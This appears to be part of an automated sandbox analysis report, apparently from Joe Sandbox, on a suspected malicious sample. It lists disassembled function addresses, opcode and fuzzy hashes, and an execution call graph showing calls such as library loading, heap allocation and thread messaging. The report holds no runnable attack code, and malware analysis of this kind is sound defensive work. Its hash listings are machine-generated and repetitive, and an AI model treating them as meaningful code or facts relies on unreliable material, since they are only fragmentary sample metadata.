                                                        • API String ID:
                                                        • Opcode ID: 131a1d5408410e201f6ec3ca8dc50a58f56beb8bf9bede33a322d17128c50748
                                                        • Instruction ID: ebe0358b2a46aa9673b2af7252a30fdf9313a2b7a41e2f14cfae4f7849f4ae92
                                                        • Opcode Fuzzy Hash: 131a1d5408410e201f6ec3ca8dc50a58f56beb8bf9bede33a322d17128c50748
                                                        • Instruction Fuzzy Hash: 7FC1A9707016608FEB29DB75C450BAEB7FAAFC9304F24446DD24A8B290CF35E909CB61
                                                        Function 0718F778 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3ec7eeddf8a50bcadacfdba6beba8fc6549a99370bf465cdf29a3a3fca68c99
                                                        • Instruction ID: 5963ac74f2a67c6ddf98c715c0044da2fdfc77964e4b625053cdc73e772927e7
                                                        • Opcode Fuzzy Hash: d3ec7eeddf8a50bcadacfdba6beba8fc6549a99370bf465cdf29a3a3fca68c99
                                                        • Instruction Fuzzy Hash: A5E1E8B4E001198FCB14DFA9C590AAEFBB6FF89305F248169E814AB355D730AD42CF61
                                                        Function 0718F340 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6772b67e112d9d3a23171b0549b00d3bec8a89a8eee4df1044eb7a8884775dea
                                                        • Instruction ID: fa9d4e354156668923699cd4f22489e6083364b7a8e0b99326809a7a581aac70
                                                        • Opcode Fuzzy Hash: 6772b67e112d9d3a23171b0549b00d3bec8a89a8eee4df1044eb7a8884775dea
                                                        • Instruction Fuzzy Hash: F1E1E9B4E041198FDB14DFA9C5909AEBBF6FF89305F248169D814AB355D730AD42CF60
                                                        Function 0718EF08 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f13e4b8176d73700e28fd860fb3070d42974f5ce7fe771e5d356a4f18587bec
                                                        • Instruction ID: 68522b850bae2dab04449b1dd66d1e4b1b2129eccac8e40f05c599715861289a
                                                        • Opcode Fuzzy Hash: 9f13e4b8176d73700e28fd860fb3070d42974f5ce7fe771e5d356a4f18587bec
                                                        • Instruction Fuzzy Hash: 20E1F7B4E041198FCB14DFA9C590AAEFBB6FF89305F248169D814AB355D731AD82CF60
                                                        Function 02C21B48 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d11cfbec8b858abea099e92fec84c6bd101d33d9fbe93279f5303de29726b46
                                                        • Instruction ID: fa2df9c4e086741b742129eaa24255043954795950054c559ecbe469316d133e
                                                        • Opcode Fuzzy Hash: 5d11cfbec8b858abea099e92fec84c6bd101d33d9fbe93279f5303de29726b46
                                                        • Instruction Fuzzy Hash: 23E1FA74E001598FCB14DFA9C580AAEFBB2FF89304F249169D818AB356DB71AD45CF60
                                                        Function 07187967 Relevance: .3, Instructions: 270COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 409694e2859581de2f171d93c5ad26c866f060e3f2758cf4fea486d4a0a3079c
                                                        • Instruction ID: 2b7384346277e506587d1955daca5f97b46c0e67ba55abff0794227abd19b8b5
                                                        • Opcode Fuzzy Hash: 409694e2859581de2f171d93c5ad26c866f060e3f2758cf4fea486d4a0a3079c
                                                        • Instruction Fuzzy Hash: 4CD1E43192075ACACB00EBA4D995A99B771FF99300F10C79AE5097B224FF706EC4DB81
                                                        Function 07187978 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a69ff925da390f7053ab662ba5ca0766a23df6abe10b06f3b2c445cd5730e8bd
                                                        • Instruction ID: 7130a0034210579f3d9170e34213badb07078dcbb04420b60c5a6d5e6560d580
                                                        • Opcode Fuzzy Hash: a69ff925da390f7053ab662ba5ca0766a23df6abe10b06f3b2c445cd5730e8bd
                                                        • Instruction Fuzzy Hash: 25D1F53192075ACACB00EBA4D995A99B771FF99300F10C79AE5097B224FF706EC4DB81
                                                        Function 012DD364 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25c4a9a85b2ba7065e06e724196970a3030e9fa7c81a142928dfc950513136fc
                                                        • Instruction ID: f588ce06d6576c39defe746cb1c68ce5044fadfac0b5fc20eafa167a283ff045
                                                        • Opcode Fuzzy Hash: 25c4a9a85b2ba7065e06e724196970a3030e9fa7c81a142928dfc950513136fc
                                                        • Instruction Fuzzy Hash: 18A19236E1021ACFCF15DFB4D9445EEBBB2FF84301B15856AE906AB265EB31D906CB40
                                                        Function 02C21B38 Relevance: .1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1204a407cd33b0a4482cdfbdbee9c6910cbdd717839997abccdc42946cfd2d8e
                                                        • Instruction ID: 93a2445810b723357bff4621726b12f81c4e54ea5742f752f60c9e9f76d0fa48
                                                        • Opcode Fuzzy Hash: 1204a407cd33b0a4482cdfbdbee9c6910cbdd717839997abccdc42946cfd2d8e
                                                        • Instruction Fuzzy Hash: D2512A75E006198FDB14CFA9C9805AEFBF2FF89304F249169D418AB216DB719942CFA1
                                                        Function 02C23F19 Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9563d6a04a130a83ec0abf3f66c8d3965f45c025f66af109d131763276597753
                                                        • Instruction ID: 65c050f152757f0df37c8c863a542307cfcd9b6fe38ebbaa4146dc82054e94e3
                                                        • Opcode Fuzzy Hash: 9563d6a04a130a83ec0abf3f66c8d3965f45c025f66af109d131763276597753
                                                        • Instruction Fuzzy Hash: 10412AB1D04668DBDB18CFAADC047DDBBB6AF89310F04C1EAD408A7264DB354A85DF41
                                                        Function 0718190B Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e549023638236566f7559d06e5b9296de184dae3020267d041774888d4429de7
                                                        • Instruction ID: 995fa7c0f4145f861a8bd3e31f31e5d8858a0c4a2ca69389752031ead7756342
                                                        • Opcode Fuzzy Hash: e549023638236566f7559d06e5b9296de184dae3020267d041774888d4429de7
                                                        • Instruction Fuzzy Hash: 1841E4B2B2060ADFC754DB69C885A5AB7F6EF85350F45D42EE05ACB6A0D334E942CF01
                                                        Function 07181918 Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96825003c5ed55177d2fbf484133f99eeb4097b1be0e10d119f6beea0521ca99
                                                        • Instruction ID: c5f0f4a78ea9e5d16e5e88344d0facc6bcad35944cf2645f453ab4a97c1df9b7
                                                        • Opcode Fuzzy Hash: 96825003c5ed55177d2fbf484133f99eeb4097b1be0e10d119f6beea0521ca99
                                                        • Instruction Fuzzy Hash: 1841D172B10609CFC754CB69C885A5ABBF6EF85350F45D82EE05ACB6A4D334E942CF01
                                                        Function 02C23EC1 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6290bd4920738da2a3ccec1b8b7ece37bb8e993e2a91fd8d7efd4c59a0a6a8c
                                                        • Instruction ID: ae54427bb9f97b58d1acbd0389f45a163f24c7a4440b89d92aed803c86e3f5f8
                                                        • Opcode Fuzzy Hash: d6290bd4920738da2a3ccec1b8b7ece37bb8e993e2a91fd8d7efd4c59a0a6a8c
                                                        • Instruction Fuzzy Hash: 7531DA71D05668CBEB28CF6B9C057D9FAB6AFC9300F04C1AAC40DA6255DB350A89CF51

                                                        Execution Graph

                                                        Execution Coverage:1.1%
                                                        Dynamic/Decrypted Code Coverage:4.5%
                                                        Signature Coverage:8.4%
                                                        Total number of Nodes:155
                                                        Total number of Limit Nodes:13
                                                        execution_graph 92936 4240a3 92937 4240bf 92936->92937 92938 4240e7 92937->92938 92939 4240fb 92937->92939 92940 42b2e3 NtClose 92938->92940 92946 42b2e3 92939->92946 92942 4240f0 92940->92942 92943 424104 92949 42d2d3 RtlAllocateHeap 92943->92949 92945 42410f 92947 42b300 92946->92947 92948 42b311 NtClose 92947->92948 92948->92943 92949->92945 92999 424433 93004 424442 92999->93004 93000 4244cc 93001 424489 93002 42d1b3 RtlFreeHeap 93001->93002 93003 424499 93002->93003 93004->93000 93004->93001 93005 4244c7 93004->93005 93006 42d1b3 RtlFreeHeap 93005->93006 93006->93000 93007 42a8f3 93008 42a90d 93007->93008 93011 1932df0 LdrInitializeThunk 93008->93011 93009 42a935 93011->93009 93012 42e293 93013 42e2a3 93012->93013 93014 42e2a9 93012->93014 93015 42d293 RtlAllocateHeap 93014->93015 93016 42e2cf 93015->93016 92950 41de43 92951 41de69 92950->92951 92955 41df57 92951->92955 92956 42e3c3 92951->92956 92953 41defb 92953->92955 92962 42a943 92953->92962 92957 42e333 92956->92957 92958 42e390 92957->92958 92966 42d293 92957->92966 92958->92953 92960 42e36d 92969 42d1b3 92960->92969 92963 42a960 92962->92963 92978 1932c0a 92963->92978 92964 42a98c 92964->92955 92972 42b5f3 92966->92972 92968 42d2ae 92968->92960 92975 42b643 92969->92975 92971 42d1cc 92971->92958 92973 42b60d 92972->92973 92974 42b61e RtlAllocateHeap 92973->92974 92974->92968 92976 42b65d 92975->92976 92977 42b66e RtlFreeHeap 92976->92977 92977->92971 92979 1932c11 92978->92979 92980 1932c1f LdrInitializeThunk 92978->92980 92979->92964 92980->92964 92981 41ad23 92982 41ad67 92981->92982 92983 42b2e3 NtClose 92982->92983 92984 41ad88 92982->92984 92983->92984 93017 1932b60 LdrInitializeThunk 92985 413cc5 92986 413cdd 92985->92986 92991 4176b3 92986->92991 92988 413cfb 92989 413d2f PostThreadMessageW 92988->92989 92990 413d40 92988->92990 92989->92990 92993 4176cf 92991->92993 92992 4176de 92992->92988 92993->92992 92995 4176fd 92993->92995 92998 42e673 LdrLoadDll 92993->92998 92996 41772a 92995->92996 92997 417719 LdrLoadDll 92995->92997 92996->92988 92997->92996 92998->92995 93018 401c16 93019 401bc0 93018->93019 93021 401c1f 93018->93021 93023 42e753 93019->93023 93026 42cda3 93023->93026 93027 42cdc9 93026->93027 93038 407113 93027->93038 93029 42cddf 93037 401c0d 93029->93037 93041 41ab33 93029->93041 93031 42cdfe 93032 42ce13 93031->93032 93056 42b693 93031->93056 93052 427373 93032->93052 93035 42ce22 93036 42b693 ExitProcess 93035->93036 93036->93037 93059 4163e3 93038->93059 93040 407120 93040->93029 93042 41ab5f 93041->93042 93070 41aa23 93042->93070 93045 41aba4 93047 41abc0 93045->93047 93050 42b2e3 NtClose 93045->93050 93046 41ab8c 93048 41ab97 93046->93048 93049 42b2e3 NtClose 93046->93049 93047->93031 93048->93031 93049->93048 93051 41abb6 93050->93051 93051->93031 93053 4273cd 93052->93053 93054 4273da 93053->93054 93081 418203 93053->93081 93054->93035 93057 42b6b0 93056->93057 93058 42b6c1 ExitProcess 93057->93058 93058->93032 93060 4163fa 93059->93060 93062 416413 93060->93062 93063 42bd13 93060->93063 93062->93040 93065 42bd2b 93063->93065 93064 42bd4f 93064->93062 93065->93064 93066 42a943 LdrInitializeThunk 93065->93066 93067 42bda4 93066->93067 93068 42d1b3 RtlFreeHeap 93067->93068 93069 42bdbd 93068->93069 93069->93062 93071 41aa3d 93070->93071 93075 41ab19 93070->93075 93076 42a9e3 93071->93076 93074 42b2e3 NtClose 93074->93075 93075->93045 93075->93046 93077 42aa00 93076->93077 93080 19335c0 LdrInitializeThunk 93077->93080 93078 41ab0d 93078->93074 93080->93078 93083 418221 93081->93083 93082 41869b 93082->93054 93083->93082 93089 413df3 93083->93089 93085 41833a 93085->93082 93086 42d1b3 RtlFreeHeap 93085->93086 93087 418352 93086->93087 93087->93082 93088 42b693 ExitProcess 93087->93088 93088->93082 93090 413e12 93089->93090 93091 413f67 93090->93091 93094 413f30 93090->93094 93098 413f26 93090->93098 93100 427513 93090->93100 93091->93085 93093 413f44 93093->93091 93109 41ae43 RtlFreeHeap LdrInitializeThunk 93093->93109 93094->93091 93108 41ae43 RtlFreeHeap LdrInitializeThunk 93094->93108 93096 413f5d 93096->93085 93105 413843 93098->93105 93101 427570 93100->93101 93102 4275ab 93101->93102 93110 413f73 93101->93110 93102->93090 93104 42758d 93104->93090 93121 42b553 93105->93121 93108->93093 93109->93096 93111 413f29 93110->93111 93114 413f67 93110->93114 93112 413843 LdrInitializeThunk 93111->93112 93113 413f30 93112->93113 93113->93114 93119 41ae43 RtlFreeHeap LdrInitializeThunk 93113->93119 93114->93104 93116 413f44 93116->93114 93120 41ae43 RtlFreeHeap LdrInitializeThunk 93116->93120 93118 413f5d 93118->93104 93119->93116 93120->93118 93122 42b56d 93121->93122 93125 1932c70 LdrInitializeThunk 93122->93125 93123 413865 93123->93094 93125->93123 93126 4188b8 93127 4188bd 93126->93127 93128 42b2e3 NtClose 93127->93128 93129 4188c2 93128->93129

                                                        Executed Functions

                                                        Function 004176B3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 246 4176b3-4176dc call 42deb3 250 4176e2-4176f0 call 42e3d3 246->250 251 4176de-4176e1 246->251 254 417700-417711 call 42c873 250->254 255 4176f2-4176fd call 42e673 250->255 260 417713-417727 LdrLoadDll 254->260 261 41772a-41772d 254->261 255->254 260->261
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 972c7fab56d31af967c755d90e9ef108d00ec9d04763406e6b29f8982412051b
                                                        • Instruction ID: 495fad05c013ab4643b5ca0f61915e616880044bf75f2bfe54ee8eab301d4f68
                                                        • Opcode Fuzzy Hash: 972c7fab56d31af967c755d90e9ef108d00ec9d04763406e6b29f8982412051b
                                                        • Instruction Fuzzy Hash: 1F0112B5E4010DBBDB10DAE5DC42FDEB378AB54304F004196E91897281FA75EB54C795
                                                        Function 0042B2E3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 292 42b2e3-42b31f call 404623 call 42c373 NtClose
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 107a58e02835addb894d731512d60433070ccd53c3aca26d0bedc16aa1168d12
                                                        • Instruction ID: 12270b8c7aaf2485cba5513cae1e7d7cd916ee1ffaf422d89da4d46528f11305
                                                        • Opcode Fuzzy Hash: 107a58e02835addb894d731512d60433070ccd53c3aca26d0bedc16aa1168d12
                                                        • Instruction Fuzzy Hash: A9E04F722402147FD150EA5ADC41FDB776CDBC6710F004469FA08A7242CA75794586E5
                                                        Function 01932B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f650b929cc413babf6100c04b9e5ebe573f17bf3977d0f59ad14dd3aced88c01
                                                        • Instruction ID: de9ec2431e12ad3b04cd31b56ca0a3c9c3646c7abd399902d843827d6304ab5f
                                                        • Opcode Fuzzy Hash: f650b929cc413babf6100c04b9e5ebe573f17bf3977d0f59ad14dd3aced88c01
                                                        • Instruction Fuzzy Hash: 4190026120250003410571984428A16804E97E0201B55C021E1054590DC56589916225
                                                        Function 01932DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 72b2303f89e1fa74ce96aaaf24374e379a6b60161d4c4238ef695ad891f12cb8
                                                        • Instruction ID: cec433211a25b045472f8980b887068343dd9d0aea08be5211369d99b2db113a
                                                        • Opcode Fuzzy Hash: 72b2303f89e1fa74ce96aaaf24374e379a6b60161d4c4238ef695ad891f12cb8
                                                        • Instruction Fuzzy Hash: 3190023120150413D11171984518B07404D97D0241F95C412E0464558DD6968A52A221
                                                        Function 01932C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 5255abd62ee76549453c19a2415397755507b8ea5f4d691a70a500caf3298c34
                                                        • Instruction ID: d4320990aa8f14cc7f25127525f6a4f2332cdb69020d87b5cb946776a62d7854
                                                        • Opcode Fuzzy Hash: 5255abd62ee76549453c19a2415397755507b8ea5f4d691a70a500caf3298c34
                                                        • Instruction Fuzzy Hash: 6590023120158803D11071988418B4A404997D0301F59C411E4464658DC6D589917221
                                                        Function 019335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3db2909a448f478300e3334aead8433f58c6f878f62660d5ea8e407d1930e6a
                                                        • Instruction ID: 9ec53913d46f6b7284ae9873228a4d2569301da27297aa30c1eace35b766e072
                                                        • Opcode Fuzzy Hash: a3db2909a448f478300e3334aead8433f58c6f878f62660d5ea8e407d1930e6a
                                                        • Instruction Fuzzy Hash: AD90023160560403D10071984528B06504997D0201F65C411E0464568DC7D58A5166A2
                                                        Function 00413C03 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 0-4090662830
                                                        • Opcode ID: 755dcdf2b96ed5a5b2357e4900850d4912c23bc3988f3b5a691f41927c491fa8
                                                        • Instruction ID: c33a5d47c10ff68413b5924596aa9377ce68296360a93c2282428cd8a7d1e98d
                                                        • Opcode Fuzzy Hash: 755dcdf2b96ed5a5b2357e4900850d4912c23bc3988f3b5a691f41927c491fa8
                                                        • Instruction Fuzzy Hash: 0221AF32A01259EBD7209FA5ECC18DFB728DF86310F00059AE954AF251E7395F52C7D9
                                                        Function 00413CC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 00413D3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830
                                                        • Opcode ID: 0241f99d3a8d22818e0a53167b1fb92c1e9423dff2207b623715dae5edb22763
                                                        • Instruction ID: a0231da7481276d6826930d3c971942d66b420a55ad4c29faaeab9665c04fdb3
                                                        • Opcode Fuzzy Hash: 0241f99d3a8d22818e0a53167b1fb92c1e9423dff2207b623715dae5edb22763
                                                        • Instruction Fuzzy Hash: 3101DBB1E0015CBAEB00ABE59C81DEF7B7CDF45694F448069FA1477241D5784F0687B5
                                                        Function 00413CC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 37 413cc5-413cd5 38 413cdd-413d2d call 42dc63 call 4176b3 call 404593 call 424543 37->38 39 413cd8 call 42d253 37->39 50 413d4d-413d53 38->50 51 413d2f-413d3e PostThreadMessageW 38->51 39->38 51->50 52 413d40-413d4a 51->52 52->50
                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 00413D3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830
                                                        • Opcode ID: eddf315d96b16d5da4478846bcc7b9025434b157e29f7dc37e4efa0a48f9c1d1
                                                        • Instruction ID: 0ab0f0f6696217fe1ee187957324101c103d959df139e2a20fb889cd2793c0ed
                                                        • Opcode Fuzzy Hash: eddf315d96b16d5da4478846bcc7b9025434b157e29f7dc37e4efa0a48f9c1d1
                                                        • Instruction Fuzzy Hash: 0301D6B2E0015CBAEB00ABE59C81DEF7B7CDF45698F448069FA14BB241D5784F068BB5
                                                        Function 0042B643 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 62 42b643-42b684 call 404623 call 42c373 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B67F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: adA
                                                        • API String ID: 3298025750-3055462304
                                                        • Opcode ID: 2d7a4206cf0a9173fe4b0f884d5e107c5eefc294f47232e3432edd77e42700f4
                                                        • Instruction ID: 383ad95f773c5ac625b87ea8c4ea0854de4e179a7c675992f6f853061364bf9a
                                                        • Opcode Fuzzy Hash: 2d7a4206cf0a9173fe4b0f884d5e107c5eefc294f47232e3432edd77e42700f4
                                                        • Instruction Fuzzy Hash: 7DE092B26446047BD610EE59DC41FDB33ACDFC9714F004419FD09A7242D775B91087B8
                                                        Function 00417733 Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 263 417733-417748 264 41774a-41774d 263->264 265 4176cf-4176dc call 42deb3 263->265 266 417715-417727 LdrLoadDll 264->266 267 41774f 264->267 271 4176e2-4176f0 call 42e3d3 265->271 272 4176de-4176e1 265->272 269 41772a-41772d 266->269 275 417700-417711 call 42c873 271->275 276 4176f2-4176fd call 42e673 271->276 275->269 281 417713-417716 275->281 276->275 282 417719-417727 LdrLoadDll 281->282 282->269
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: f4fb5eefa6fffb4962a7d3246539e07383bb9b19fe4213f3e5edd2d8a6196605
                                                        • Instruction ID: 51b40c388f19947ffea00ae2907a3568628f2c4f6d92e3d3a9a588b8eefe9da0
                                                        • Opcode Fuzzy Hash: f4fb5eefa6fffb4962a7d3246539e07383bb9b19fe4213f3e5edd2d8a6196605
